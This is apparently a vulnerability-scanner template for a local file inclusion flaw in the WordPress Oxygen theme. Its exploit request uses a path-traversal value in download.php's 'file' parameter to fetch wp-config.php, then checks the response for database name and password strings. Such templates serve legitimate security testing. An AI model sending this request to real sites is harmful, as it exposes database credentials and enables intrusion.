product: WordPress
vName: WordPress Oxygen-Theme - Local File Inclusion
type: 文件读取
vID: [ ]
level: 3
vDesc: WordPress Oxygen-Theme has a local file inclusion vulnerability via the 'file' parameter of 'download.php'.
version: ''
note: ''
search: { }
protocol: http
link: https://cxsecurity.com/issue/WLB-2019030178
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /wp-content/themes/oxygen-theme/download.php?file=../../../wp-config.php
    verify:
      logic: and
      check:
        - body:
            value:
              - DB_NAME
              - DB_PASSWORD
            logic: and
        - status: 200
